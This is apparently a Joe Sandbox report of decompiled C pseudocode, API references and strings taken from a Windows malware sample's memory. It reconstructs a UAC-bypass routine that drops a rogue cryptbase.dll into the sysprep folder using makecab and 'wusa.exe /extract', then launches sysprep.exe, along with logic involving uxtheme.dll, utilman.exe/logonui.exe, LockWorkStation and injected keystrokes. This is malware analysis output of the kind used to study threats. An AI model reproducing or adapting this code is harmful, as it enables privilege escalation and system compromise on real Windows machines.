				GetTempPathA(0x104,  &_v1076);
				_push(GetTickCount());
				_push("\\%.8x.tmp");
				_t105 = E00DB3620( &_v1076);
				_pop(_t182);
				wsprintfA(_t194 + _t105 - 0x430, ??);
				_v32 = _v32 & 0x00000000;
				_t196 = _t195 + 0xc;
				_t189 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "IsWow64Process");
				if(_t189 != 0) {
					_push( &_v32);
					_push(GetCurrentProcess());
					if( *_t189() == 0 || _v32 == 0) {
						goto L4;
					} else {
						return 0;
					}
				}
				L4:
				_t190 = 0xc001;
				do {
					E00DB20CE( &_v556, 0, 0x104);
					GetClipboardFormatNameA(_t190,  &_v556, 0x104);
					if(E00DB20EC( &_v556) != 0) {
						if(E00DB2104( &_v556,  &_v296) == 0) {
							_v12 = _t190 & 0x0000ffff;
							_v24 = 1;
						}
						_t174 = E00DB3B50( &_v556, "\\uxtheme.dll");
						_pop(_t182);
						if(_t174 != 0) {
							_v12 = _t190 & 0x0000ffff;
						}
					}
					_t190 = _t190 + 1;
				} while (_t190 < 0xffff);
				if(_v12 == 0) {
					L38:
					return _v28;
				}
				_v8 = 0;
				_v16 = 0;
				_v20 = 0;
				if(E00DB250C(_t182,  &_v816,  &_v8,  &_v16) == 0) {
					goto L38;
				}
				if(E00DB2F02(_v8, _v16,  &_v1076, _a12) != 0) {
					if(_v24 != 0) {
						GetTempPathA(0x104,  &_v1336);
						_t162 = GetTickCount();
						wsprintfA(_t194 + E00DB3620( &_v1336) - 0x534, "\\%.8x.tmp", _t162);
						_t196 = _t196 + 0xc;
						MoveFileA( &_v296,  &_v1336);
					}
					if(E00DB24AA( &_v296, _v8, _v16) != 0) {
						_v20 = 1;
					}
				}
				_t125 = E00DB24AA( &_v1076, _a4, _a8);
				if(_t125 == 0) {
					_v20 = _v20 & _t125;
				}
				LocalFree(_v8);
				if(_v20 != 0) {
					if(_v24 != 0) {
						L30:
						if(E00DB27DD() == 0) {
							E00DB30CD(0x55);
						} else {
							__imp__LockWorkStation();
						}
						_t130 = CreateEventA(0, 0, 0, "Global\\AtomFun");
						_a12 = _t130;
						if(_t130 != 0) {
							if(WaitForSingleObject(_t130, 0x2710) == 0) {
								_v28 = 1;
							}
							CloseHandle(_a12);
							GetTempPathA(0x104,  &_v1596);
							_t135 = GetTickCount();
							wsprintfA(_t194 + E00DB3620( &_v1596) - 0x638, "\\%.8x.tmp", _t135);
							MoveFileA( &_v296,  &_v1596);
							CopyFileA( &_v816,  &_v296, 0);
						} else {
							L34:
							GetLastError();
						}
						goto L38;
					}
					if(E00DB3065(_v36, _v12) == 0) {
						goto L38;
					}
					_a12 = 0xc001;
					while(1) {
						E00DB20CE( &_v556, 0, 0x104);
						GetClipboardFormatNameA(_a12,  &_v556, 0x104);
						if(E00DB20EC( &_v556) != 0 && E00DB3B50( &_v556, "\\uxtheme.dll") != 0) {
							goto L38;
						}
						_a12 = _a12 + 1;
						if(_a12 < 0xffff) {
							continue;
						}
						_a12 = 0xc001;
						while(RegisterWindowMessageA( &_v296) != 0) {
							_a12 = _a12 + 1;
							if(_a12 < 0xffff) {
								continue;
							}
							goto L30;
						}
						goto L34;
					}
				}
			}

0x00db3158
0x00db315b
0x00db315d
0x00db3160
0x00db3163
0x00db3173
0x00db3192
0x00db31a5
0x00db31c0
0x00db31cd
0x00db31d5
0x00db31dc
0x00db31e2
0x00db31e7
0x00db31f0
0x00db31f6
0x00db31fa
0x00db3210
0x00db3214
0x00db3219
0x00db3220
0x00db3225
0x00000000
0x00db322d
0x00000000
0x00db322d
0x00db3225
0x00db3234
0x00db3234
0x00db3239
0x00db3243
0x00db3251
0x00db3265
0x00db327c
0x00db3281
0x00db3284
0x00db3284
0x00db3297
0x00db329d
0x00db32a0
0x00db32a5
0x00db32a5
0x00db32a0
0x00db32a8
0x00db32a9
0x00db32b7
0x00db34e5
0x00000000
0x00db34e5
0x00db32bd
0x00db32c0
0x00db32c3
0x00db32dc
0x00000000
0x00000000
0x00db32ff
0x00db3305
0x00db330f
0x00db3311
0x00db3332
0x00db3338
0x00db3349
0x00db3349
0x00db335f
0x00db3361
0x00db3361
0x00db335f
0x00db3375
0x00db337c
0x00db337e
0x00db337e
0x00db3384
0x00db338e
0x00db3398
0x00db3434
0x00db343b
0x00db3447
0x00db343d
0x00db343d
0x00db343d
0x00db3456
0x00db345c
0x00db3461
0x00db3479
0x00db347b
0x00db347b
0x00db3485
0x00db3493
0x00db3495
0x00db34b6
0x00db34cd
0x00db34df
0x00db3463
0x00db3463
0x00db3463
0x00db3463
0x00000000
0x00db3461
0x00db33ab
0x00000000
0x00000000
0x00db33b1
0x00db33b8
0x00db33c2
0x00db33d2
0x00db33e6
0x00000000
0x00000000
0x00db3403
0x00db340d
0x00000000
0x00000000
0x00db340f
0x00db3416
0x00db3428
0x00db3432
0x00000000
0x00000000
0x00000000
0x00db3432
0x00000000
0x00db3416
0x00db33b8

APIs

GetModuleHandleA.KERNEL32(00000000,00000000,7622DAA3,00000000), ref: 00DB315B
GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00DB3173
GetTempPathA.KERNEL32(00000104,?), ref: 00DB31A5
GetTempPathA.KERNEL32(00000104,?), ref: 00DB31CD
GetTickCount.KERNEL32 ref: 00DB31CF
_strlen.LIBCMT ref: 00DB31E2
wsprintfA.USER32 ref: 00DB31F0
GetModuleHandleA.KERNEL32(kernel32.dll,IsWow64Process), ref: 00DB3207
GetProcAddress.KERNEL32(00000000), ref: 00DB320A
GetCurrentProcess.KERNEL32(00000000), ref: 00DB321A

Part of subcall function 00DB20CE: _memset.LIBCMT ref: 00DB20E1

GetClipboardFormatNameA.USER32(0000C001,?,00000104), ref: 00DB3251

Part of subcall function 00DB250C: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DB2526
Part of subcall function 00DB250C: GetFileSize.KERNEL32(00000000,00000000,7622DAA3,?,?,00DB1DD6,?,?,?,?,?), ref: 00DB2536
Part of subcall function 00DB250C: LocalAlloc.KERNEL32(00000040,00000000,?,?,00DB1DD6,?,?,?,?,?), ref: 00DB2544
Part of subcall function 00DB250C: ReadFile.KERNEL32(00000000,00000000,00DB1DD6,?,00000000), ref: 00DB255F
Part of subcall function 00DB250C: GetLastError.KERNEL32(?,?,00DB1DD6,?,?,?,?,?), ref: 00DB2572
Part of subcall function 00DB250C: GetLastError.KERNEL32(?,?,00DB1DD6,?,?,?,?,?), ref: 00DB257A
Part of subcall function 00DB250C: CloseHandle.KERNEL32(00000000), ref: 00DB2583
Part of subcall function 00DB250C: GetLastError.KERNEL32(?,?,00DB1DD6,?,?,?,?,?), ref: 00DB258C

Part of subcall function 00DB2F02: GetModuleHandleA.KERNEL32(kernel32.dll,LoadLibraryA,?,00000000,00000110,?,.rsrc,00000005,76248354,0000C002,00000104,76248354,?,?), ref: 00DB2F9E
Part of subcall function 00DB2F02: GetProcAddress.KERNEL32(00000000), ref: 00DB2FA5
Part of subcall function 00DB2F02: GetModuleHandleA.KERNEL32(kernel32.dll,WinExec), ref: 00DB2FB7
Part of subcall function 00DB2F02: GetProcAddress.KERNEL32(00000000), ref: 00DB2FBE
Part of subcall function 00DB2F02: CheckSumMappedFile.IMAGEHLP(?,?,?,00000000,?,00000111,00DB2E88,?,?,?,?), ref: 00DB3043
Part of subcall function 00DB2F02: GetLastError.KERNEL32 ref: 00DB3055

GetTempPathA.KERNEL32(00000104,?), ref: 00DB330F
GetTickCount.KERNEL32 ref: 00DB3311
_strlen.LIBCMT ref: 00DB3324
wsprintfA.USER32 ref: 00DB3332
MoveFileA.KERNEL32(?,?), ref: 00DB3349

Part of subcall function 00DB24AA: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00DB24BF
Part of subcall function 00DB24AA: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00DB24DB
Part of subcall function 00DB24AA: GetLastError.KERNEL32(?,00DB337A,?,?,?,?,?,?,00DB1E68,?,?,?,?), ref: 00DB24E8
Part of subcall function 00DB24AA: FlushFileBuffers.KERNEL32(00000000), ref: 00DB24EF
Part of subcall function 00DB24AA: CloseHandle.KERNEL32(00000000), ref: 00DB24F6
Part of subcall function 00DB24AA: GetLastError.KERNEL32(?,00DB337A,?,?,?,?,?,?,00DB1E68,?,?,?,?), ref: 00DB24FE

LocalFree.KERNEL32(?,?,?,?,?,?,?,00DB1E68,?,?,?,?), ref: 00DB3384
CopyFileA.KERNEL32(?,?,00000000), ref: 00DB34DF

Part of subcall function 00DB3065: RegisterClassExA.USER32(?), ref: 00DB30A4
Part of subcall function 00DB3065: UnregisterClassA.USER32(?,?), ref: 00DB30B4

GetClipboardFormatNameA.USER32(0000C001,?,00000104), ref: 00DB33D2
RegisterWindowMessageA.USER32(?,?), ref: 00DB341D

Part of subcall function 00DB27DD: GetVersionExA.KERNEL32(?), ref: 00DB27F7
Part of subcall function 00DB27DD: GetLastError.KERNEL32 ref: 00DB2818

LockWorkStation.USER32 ref: 00DB343D

Part of subcall function 00DB30CD: SendInput.USER32(00000001,?,0000001C), ref: 00DB30FF
Part of subcall function 00DB30CD: SendInput.USER32(00000001,?,0000001C), ref: 00DB3114
Part of subcall function 00DB30CD: SendInput.USER32(00000001,?,0000001C), ref: 00DB3127
Part of subcall function 00DB30CD: SendInput.USER32(00000001,?,0000001C), ref: 00DB313A

CreateEventA.KERNEL32(00000000,00000000,00000000,Global\AtomFun,00000055), ref: 00DB3456
GetLastError.KERNEL32 ref: 00DB3463
WaitForSingleObject.KERNEL32(00000000,00002710), ref: 00DB3471
CloseHandle.KERNEL32(00000000), ref: 00DB3485
GetTempPathA.KERNEL32(00000104,?), ref: 00DB3493
GetTickCount.KERNEL32 ref: 00DB3495
_strlen.LIBCMT ref: 00DB34A8
wsprintfA.USER32 ref: 00DB34B6
MoveFileA.KERNEL32(?,?), ref: 00DB34CD

Strings

Global\AtomFun, xrefs: 00DB344C
kernel32.dll, xrefs: 00DB3202
IsWow64Process, xrefs: 00DB31FD
\uxtheme.dll, xrefs: 00DB3179, 00DB31A7, 00DB3291, 00DB33EE
\%.8x.tmp, xrefs: 00DB31DC, 00DB331E, 00DB34A2

Memory Dump Source

Source File: 00000001.00000002.1214292305.00DB1000.00000020.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.1214287608.00DB0000.00000002.sdmp
Associated: 00000001.00000002.1214299486.00DB5000.00000004.sdmp
Associated: 00000001.00000002.1214304429.00DB6000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_db0000_WBKDqSfWLj.jbxd

Similarity

API ID: File$ErrorLast$Handle$InputModulePathSendTemp$AddressCloseCountCreateProcTick_strlenwsprintf$ClassClipboardFormatLocalMoveNameRegister$AllocBuffersCheckCopyCurrentDirectoryEventFlushFreeLockMappedMessageObjectProcessReadSingleSizeStationSystemUnregisterVersionWaitWindowWorkWrite_memset
String ID: Global\AtomFun$IsWow64Process$\%.8x.tmp$\uxtheme.dll$kernel32.dll
API String ID: 1235156964-746268175
Opcode ID: c8fb400b813e383541aa9bac0a3aa128283ba7448c65547d093e1a0f28384e90
Instruction ID: f0923e5ec51edb32644d634f11a714fe9761bcc1d3d6be356522af35f9013d75
Opcode Fuzzy Hash: c8fb400b813e383541aa9bac0a3aa128283ba7448c65547d093e1a0f28384e90
Instruction Fuzzy Hash: 28A1E476800219EADF21AFA4DC59AEE77BCEF08340F5405A6F506E2150EB74DB94DB70

Uniqueness

Uniqueness Score: -1.00%

Function 00DB2BDC, Relevance: 54.5, APIs: 20, Strings: 11, Instructions: 209
filelibraryloaderCOMMON

C-Code - Quality: 94%

			E00DB2BDC(void* __ebx) {
				intOrPtr _t71;
				long _t74;
				void* _t135;
				void* _t143;
				int _t152;
				intOrPtr* _t154;
				signed int _t155;
				void* _t159;
				void* _t161;

				_t135 = __ebx;
				_t159 = _t161 - 0x6c;
				 *((intOrPtr*)(_t159 + 0x5c)) = 0;
				 *((intOrPtr*)(_t159 + 0x60)) = 0;
				_t154 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "IsWow64Process");
				if(_t154 != 0) {
					 *_t154(GetCurrentProcess(), _t159 + 0x60);
				}
				 *(_t159 - 0x38) = 0x94;
				_t155 = 0 |  *((intOrPtr*)(_t159 + 0x60)) == 0x00000000;
				if(GetVersionExA(_t159 - 0x38) == 0) {
					GetLastError();
					goto L23;
				} else {
					if( *((intOrPtr*)(_t159 - 0x28)) != 2 ||  *((intOrPtr*)(_t159 - 0x34)) != 6 ||  *((intOrPtr*)(_t159 - 0x30)) != 1 &&  *((intOrPtr*)(_t159 - 0x30)) != 2) {
						_t155 = 0;
					}
					if(_t155 == 0) {
						L23:
						_t71 = 0;
						goto L24;
					} else {
						GetTempPathA(0x104, _t159 - 0x240);
						_t74 = GetTickCount();
						wsprintfA(_t159 + E00DB3620(_t159 - 0x240) - 0x240, "\\%.8x.tmp", _t74);
						if(E00DB24AA(_t159 - 0x240,  *((intOrPtr*)(_t159 + 0x74)),  *(_t159 + 0x78)) == 0) {
							goto L23;
						}
						GetSystemDirectoryA(_t159 - 0x54c, 0x104);
						E00DB3A60(_t159 - 0x54c, "\\cryptbase.dll");
						GetTempPathA(0x104, _t159 - 0x344);
						E00DB3A60(_t159 - 0x344, "\\cryptbase.dll");
						 *(_t159 + 0x68) =  *(_t159 + 0x68) & 0x00000000;
						 *(_t159 + 0x64) =  *(_t159 + 0x64) & 0x00000000;
						_t143 = _t135;
						if(E00DB250C(_t143, _t159 - 0x54c, _t159 + 0x68, _t159 + 0x64) != 0) {
							if(E00DB2F02( *(_t159 + 0x68),  *(_t159 + 0x64), _t159 - 0x240,  *((intOrPtr*)(_t159 + 0x7c))) != 0 && E00DB24AA(_t159 - 0x344,  *(_t159 + 0x68),  *(_t159 + 0x64)) != 0) {
								GetTempPathA(0x104, _t159 - 0x13c);
								E00DB3A60(_t159 - 0x13c, "\\cryptbase.msu");
								DeleteFileA(_t159 - 0x13c);
								_push(_t159 - 0x13c);
								E00DB2AF9(0, "makecab.exe /V1 %s %s", _t159 - 0x344);
								if(E00DB259B(_t159 - 0x13c) != 0) {
									_t152 = 0x103;
									GetWindowsDirectoryA(_t159 - 0x650, _t152);
									E00DB3A60(_t159 - 0x650, "\\system32\\sysprep\\sysprep.exe");
									GetWindowsDirectoryA(_t159 - 0x448, _t152);
									E00DB3A60(_t159 - 0x448, "\\system32\\sysprep\\cryptbase.dll");
									E00DB2AF9(0, "cmd.exe /C wusa.exe %s /extract:%%WINDIR%%\\system32\\sysprep", _t159 - 0x13c);
									if(E00DB259B(_t159 - 0x448) != 0) {
										 *(_t159 + 0x78) =  *(_t159 + 0x78) & 0x00000000;
										if(E00DB2AF9(_t159 + 0x78, "cmd.exe /C %s", _t159 - 0x650) != 0 &&  *(_t159 + 0x78) == 0x50574e44) {
											 *((intOrPtr*)(_t159 + 0x5c)) = 1;
										}
										DeleteFileA(_t159 - 0x448);
									}
									DeleteFileA(_t159 - 0x13c);
								}
							}
							LocalFree( *(_t159 + 0x68));
						}
						DeleteFileA(_t159 - 0x344);
						DeleteFileA(_t159 - 0x240);
						_t71 =  *((intOrPtr*)(_t159 + 0x5c));
						L24:
						return _t71;
					}
				}
			}

0x00db2bdc
0x00db2bdd
0x00db2bf5
0x00db2bf8
0x00db2c08
0x00db2c0c
0x00db2c19
0x00db2c19
0x00db2c20
0x00db2c2a
0x00db2c38
0x00db2e77
0x00000000
0x00db2c3e
0x00db2c42
0x00db2c56
0x00db2c56
0x00db2c5a
0x00db2e7d
0x00db2e7d
0x00000000
0x00db2c60
0x00db2c73
0x00db2c75
0x00db2c96
0x00db2cb3
0x00000000
0x00000000
0x00db2cc2
0x00db2cd5
0x00db2ce4
0x00db2cee
0x00db2cf3
0x00db2cf7
0x00db2cfc
0x00db2d19
0x00db2d36
0x00db2d5e
0x00db2d6c
0x00db2d7a
0x00db2d82
0x00db2d91
0x00db2da7
0x00db2dad
0x00db2dbe
0x00db2dcc
0x00db2ddb
0x00db2de9
0x00db2dfc
0x00db2e12
0x00db2e14
0x00db2e32
0x00db2e3d
0x00db2e3d
0x00db2e4b
0x00db2e4b
0x00db2e54
0x00db2e54
0x00db2da7
0x00db2e59
0x00db2e59
0x00db2e66
0x00db2e6f
0x00db2e71
0x00db2e7f
0x00db2e85
0x00db2e85
0x00db2c5a

APIs

GetModuleHandleA.KERNEL32(kernel32.dll,IsWow64Process,00000000,7622DAA3), ref: 00DB2BFB
GetProcAddress.KERNEL32(00000000), ref: 00DB2C02
GetCurrentProcess.KERNEL32(?), ref: 00DB2C12
GetVersionExA.KERNEL32(?), ref: 00DB2C30
GetTempPathA.KERNEL32(00000104,?), ref: 00DB2C73
GetTickCount.KERNEL32 ref: 00DB2C75
_strlen.LIBCMT ref: 00DB2C88
wsprintfA.USER32 ref: 00DB2C96

Part of subcall function 00DB24AA: CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000002,00000000,00000000), ref: 00DB24BF
Part of subcall function 00DB24AA: WriteFile.KERNEL32(00000000,?,?,?,00000000), ref: 00DB24DB
Part of subcall function 00DB24AA: GetLastError.KERNEL32(?,00DB337A,?,?,?,?,?,?,00DB1E68,?,?,?,?), ref: 00DB24E8
Part of subcall function 00DB24AA: FlushFileBuffers.KERNEL32(00000000), ref: 00DB24EF
Part of subcall function 00DB24AA: CloseHandle.KERNEL32(00000000), ref: 00DB24F6
Part of subcall function 00DB24AA: GetLastError.KERNEL32(?,00DB337A,?,?,?,?,?,?,00DB1E68,?,?,?,?), ref: 00DB24FE

GetSystemDirectoryA.KERNEL32(?,00000104), ref: 00DB2CC2
GetTempPathA.KERNEL32(00000104,?), ref: 00DB2CE4

Part of subcall function 00DB250C: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00DB2526
Part of subcall function 00DB250C: GetFileSize.KERNEL32(00000000,00000000,7622DAA3,?,?,00DB1DD6,?,?,?,?,?), ref: 00DB2536
Part of subcall function 00DB250C: LocalAlloc.KERNEL32(00000040,00000000,?,?,00DB1DD6,?,?,?,?,?), ref: 00DB2544
Part of subcall function 00DB250C: ReadFile.KERNEL32(00000000,00000000,00DB1DD6,?,00000000), ref: 00DB255F
Part of subcall function 00DB250C: GetLastError.KERNEL32(?,?,00DB1DD6,?,?,?,?,?), ref: 00DB2572
Part of subcall function 00DB250C: GetLastError.KERNEL32(?,?,00DB1DD6,?,?,?,?,?), ref: 00DB257A
Part of subcall function 00DB250C: CloseHandle.KERNEL32(00000000), ref: 00DB2583
Part of subcall function 00DB250C: GetLastError.KERNEL32(?,?,00DB1DD6,?,?,?,?,?), ref: 00DB258C

DeleteFileA.KERNEL32(?), ref: 00DB2E6F

Part of subcall function 00DB2F02: GetModuleHandleA.KERNEL32(kernel32.dll,LoadLibraryA,?,00000000,00000110,?,.rsrc,00000005,76248354,0000C002,00000104,76248354,?,?), ref: 00DB2F9E
Part of subcall function 00DB2F02: GetProcAddress.KERNEL32(00000000), ref: 00DB2FA5
Part of subcall function 00DB2F02: GetModuleHandleA.KERNEL32(kernel32.dll,WinExec), ref: 00DB2FB7
Part of subcall function 00DB2F02: GetProcAddress.KERNEL32(00000000), ref: 00DB2FBE
Part of subcall function 00DB2F02: CheckSumMappedFile.IMAGEHLP(?,?,?,00000000,?,00000111,00DB2E88,?,?,?,?), ref: 00DB3043
Part of subcall function 00DB2F02: GetLastError.KERNEL32 ref: 00DB3055

GetTempPathA.KERNEL32(00000104,?), ref: 00DB2D5E
DeleteFileA.KERNEL32(?), ref: 00DB2D7A

Part of subcall function 00DB2AF9: LocalAlloc.KERNEL32(00000040,-00000100,00000104,7622458A), ref: 00DB2B25
Part of subcall function 00DB2AF9: _memset.LIBCMT ref: 00DB2B4D
Part of subcall function 00DB2AF9: _memset.LIBCMT ref: 00DB2B5B
Part of subcall function 00DB2AF9: GetStartupInfoA.KERNEL32(?), ref: 00DB2B6A
Part of subcall function 00DB2AF9: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00DB2D96), ref: 00DB2B8C
Part of subcall function 00DB2AF9: WaitForSingleObject.KERNEL32(00DB2D96,000000FF), ref: 00DB2B9B
Part of subcall function 00DB2AF9: GetExitCodeProcess.KERNEL32(00DB2D96,?), ref: 00DB2BAC
Part of subcall function 00DB2AF9: CloseHandle.KERNEL32(00000000), ref: 00DB2BBB
Part of subcall function 00DB2AF9: CloseHandle.KERNEL32(00DB2D96), ref: 00DB2BC0
Part of subcall function 00DB2AF9: GetLastError.KERNEL32(?,?,00000000,?,00000000,76248354), ref: 00DB2BC7
Part of subcall function 00DB2AF9: LocalFree.KERNEL32(00000000,?,?,00000000,?,00000000,76248354), ref: 00DB2BCE

Part of subcall function 00DB259B: FindFirstFileA.KERNEL32(00DB2DA5,?,00000104), ref: 00DB25B1
Part of subcall function 00DB259B: FindClose.KERNEL32(00000000), ref: 00DB25BE

GetWindowsDirectoryA.KERNEL32(?,00000103,?), ref: 00DB2DBE
GetWindowsDirectoryA.KERNEL32(?,00000103), ref: 00DB2DDB
DeleteFileA.KERNEL32(?,?,?,?), ref: 00DB2E4B
DeleteFileA.KERNEL32(?,?), ref: 00DB2E54
LocalFree.KERNEL32(?,?,?,?,?,?,?,?), ref: 00DB2E59
DeleteFileA.KERNEL32(?,?,?,?), ref: 00DB2E66
GetLastError.KERNEL32 ref: 00DB2E77

Strings

kernel32.dll, xrefs: 00DB2BF0
\cryptbase.msu, xrefs: 00DB2D66
cmd.exe /C wusa.exe %s /extract:%%WINDIR%%\system32\sysprep, xrefs: 00DB2DF5
cmd.exe /C %s, xrefs: 00DB2E22
\cryptbase.dll, xrefs: 00DB2CC8, 00DB2CD3, 00DB2CEC
\system32\sysprep\sysprep.exe, xrefs: 00DB2DC6
IsWow64Process, xrefs: 00DB2BE9
\system32\sysprep\cryptbase.dll, xrefs: 00DB2DE3
makecab.exe /V1 %s %s, xrefs: 00DB2D8A
DNWP, xrefs: 00DB2E34
\%.8x.tmp, xrefs: 00DB2C82

Memory Dump Source

Source File: 00000001.00000002.1214292305.00DB1000.00000020.sdmp, Offset: 00DB0000, based on PE: true

Associated: 00000001.00000002.1214287608.00DB0000.00000002.sdmp
Associated: 00000001.00000002.1214299486.00DB5000.00000004.sdmp
Associated: 00000001.00000002.1214304429.00DB6000.00000002.sdmp

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_db0000_WBKDqSfWLj.jbxd

Similarity

API ID: File$ErrorLast$Handle$CloseDelete$Local$AddressCreateDirectoryModulePathProcProcessTemp$AllocFindFreeWindows_memset$BuffersCheckCodeCountCurrentExitFirstFlushInfoMappedObjectReadSingleSizeStartupSystemTickVersionWaitWrite_strlenwsprintf
String ID: DNWP$IsWow64Process$\%.8x.tmp$\cryptbase.dll$\cryptbase.msu$\system32\sysprep\cryptbase.dll$\system32\sysprep\sysprep.exe$cmd.exe /C %s$cmd.exe /C wusa.exe %s /extract:%%WINDIR%%\system32\sysprep$kernel32.dll$makecab.exe /V1 %s %s
API String ID: 1577429191-2259624556
Opcode ID: 4291e57a812c7cb681b26c29072b746389cbc57a170e9e250cb45bffa2b9e552
Instruction ID: 322e40167643d490e0b702fa81d750bbb82408fd1b088181695d9a5a5e04201c
Opcode Fuzzy Hash: 4291e57a812c7cb681b26c29072b746389cbc57a170e9e250cb45bffa2b9e552
Instruction Fuzzy Hash: 9A71FD7790021CEADB21EBA4DC89AEE77ACEB04341F540556F90AE2150E734DA88CF74

Uniqueness

Uniqueness Score: -1.00%

Function 00DB1E99, Relevance: 24.6, APIs: 10, Strings: 4, Instructions: 95
COMMON

C-Code - Quality: 82%

			E00DB1E99(void* _a8) {
				char _v264;
				void* _t22;
				void* _t25;
				void* _t27;
				void* _t33;
				void* _t40;

				_t55 = _a8 != 1;
				if(_a8 != 1) {
					L9:
					return 1;
				}
				GetModuleFileNameA(GetModuleHandleA(0),  &_v264, 0x104);
				GetCurrentProcessId();
				E00DB21BB( &_v264);
				_t22 = E00DB3590(E00DB25CB(_t55,  &_v264), "utilman.exe");
				_t56 = _t22;
				if(_t22 == 0) {
					L10:
					_t40 = OpenEventA(2, 0, "Global\\AtomFun");
					__eflags = _t40;
					if(_t40 == 0) {
						GetLastError();
					} else {
						SetEvent(_t40);
						CloseHandle(_t40);
					}
					_t25 = E00DB27DD();
					__eflags = _t25;
					if(_t25 != 0) {
						_t27 = E00DB2822(GetCurrentProcessId());
						__eflags = _t27;
						if(_t27 > 0) {
							E00DB1C33(_t27, 0);
						}
					}
					L16:
					_push(0);
					L7:
					ExitProcess();
				}
				_t33 = E00DB3590(E00DB25CB(_t56,  &_v264), "logonui.exe");
				_t57 = _t33;
				if(_t33 == 0) {
					goto L10;
				}
				if(E00DB3590(E00DB25CB(_t57,  &_v264), "sysprep.exe") != 0) {
					goto L9;
				}
				_push( &_a8);
				_a8 = 0;
				_push(GetCurrentProcess());
				if(E00DB289C() == 0 || _a8 < 0x3000) {
					goto L16;
				} else {
					_push(0x50574e44);
					goto L7;
				}
			}

0x00db1ea5
0x00db1ea6
0x00db1f62
0x00db1f66
0x00db1f66
0x00db1ec4
0x00db1ed0
0x00db1ed9
0x00db1ef0
0x00db1ef7
0x00db1ef9
0x00db1f69
0x00db1f77
0x00db1f79
0x00db1f7b
0x00db1f8d
0x00db1f7d
0x00db1f7e
0x00db1f85
0x00db1f85
0x00db1f93
0x00db1f98
0x00db1f9a
0x00db1f9f
0x00db1fa4
0x00db1fa6
0x00db1faa
0x00db1faa
0x00db1fa6
0x00db1faf
0x00db1faf
0x00db1f5a
0x00db1f5a
0x00db1f5a
0x00db1f0d
0x00db1f14
0x00db1f16
0x00000000
0x00000000
0x00db1f33
0x00000000
0x00db1f61
0x00db1f38
0x00db1f39
0x00db1f42
0x00db1f4a
0x00000000
0x00db1f55
0x00db1f55
0x00000000
0x00db1f55

APIs

GetModuleHandleA.KERNEL32(00000000,?,00000104,?,?), ref: 00DB1EBD
GetModuleFileNameA.KERNEL32(00000000,?,?), ref: 00DB1EC4
GetCurrentProcessId.KERNEL32(?,?), ref: 00DB1ED0

Part of subcall function 00DB25CB: _strlen.LIBCMT ref: 00DB25D7
Part of subcall function 00DB25CB: _strlen.LIBCMT ref: 00DB25F2

GetCurrentProcess.KERNEL32(?,sysprep.exe,logonui.exe,utilman.exe,?,?,?), ref: 00DB1F3C

Part of subcall function 00DB289C: _memset.LIBCMT ref: 00DB28CA
Part of subcall function 00DB289C: GetVersionExA.KERNEL32(?,00000000,7622DF30,00000000), ref: 00DB28DF
Part of subcall function 00DB289C: GetVersionExA.KERNEL32(?), ref: 00DB28F0
Part of subcall function 00DB289C: OpenProcessToken.ADVAPI32(?,00000018,?), ref: 00DB290D
Part of subcall function 00DB289C: GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 00DB292F
Part of subcall function 00DB289C: GetLastError.KERNEL32 ref: 00DB293B
Part of subcall function 00DB289C: LocalAlloc.KERNEL32(00000040,?), ref: 00DB2947
Part of subcall function 00DB289C: GetTokenInformation.KERNELBASE(?,00000019(TokenIntegrityLevel),00000000,?,?), ref: 00DB2960
Part of subcall function 00DB289C: GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 00DB2968
Part of subcall function 00DB289C: GetSidSubAuthority.ADVAPI32(00000000,?), ref: 00DB2978
Part of subcall function 00DB289C: GetLastError.KERNEL32 ref: 00DB298B
Part of subcall function 00DB289C: LocalFree.KERNEL32(00000000), ref: 00DB2992
Part of subcall function 00DB289C: GetLastError.KERNEL32 ref: 00DB299A
Part of subcall function 00DB289C: GetLastError.KERNEL32 ref: 00DB299E
Part of subcall function 00DB289C: CloseHandle.KERNEL32(?), ref: 00DB29A7
Part of subcall function 00DB289C: GetLastError.KERNEL32 ref: 00DB29AF

ExitProcess.KERNEL32 ref: 00DB1F5A
OpenEventA.KERNEL32(00000002,00000000,Global\AtomFun,utilman.exe,?,?,?), ref: 00DB1F71
SetEvent.KERNEL32(00000000,?,?), ref: 00DB1F7E
CloseHandle.KERNEL32(00000000), ref: 00DB1F85
GetLastError.KERNEL32(?,?), ref: 00DB1F8D

Part of subcall function 00DB27DD: GetVersionExA.KERNEL32(?), ref: 00DB27F7
Part of subcall function 00DB27DD: GetLastError.KERNEL32 ref: 00DB2818

GetCurrentProcessId.KERNEL32(?,?), ref: 00DB1F9C

Part of subcall function 00DB2822: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00DB2832
Part of subcall function 00DB2822: Process32First.KERNEL32(00000000,?), ref: 00DB2850
Part of subcall function 00DB2822: Process32Next.KERNEL32(00000000,00000128), ref: 00DB286C
Part of subcall function 00DB2822: GetLastError.KERNEL32(00000000,7622D965), ref: 00DB287F
Part of subcall function 00DB2822: CloseHandle.KERNEL32(00000000), ref: 00DB2886
Part of subcall function 00DB2822: GetLastError.KERNEL32(00000000,7622D965), ref: 00DB288E

Part of subcall function 00DB1C33: CreateToolhelp32Snapshot.KERNEL32(00000004,?), ref: 00DB1C43
Part of subcall function 00DB1C33: Thread32First.KERNEL32(00000000,?), ref: 00DB1C66
Part of subcall function 00DB1C33: OpenThread.KERNEL32(00000002,00000000,00DB1FAF,7622D965,00000000,00000004,?,00000000), ref: 00DB1C91
Part of subcall function 00DB1C33: SuspendThread.KERNEL32(00000000), ref: 00DB1C9E
Part of subcall function 00DB1C33: CloseHandle.KERNEL32(00000000), ref: 00DB1CAD
Part of subcall function 00DB1C33: Thread32Next.KERNEL32(00000000,0000001C), ref: 00DB1CB4
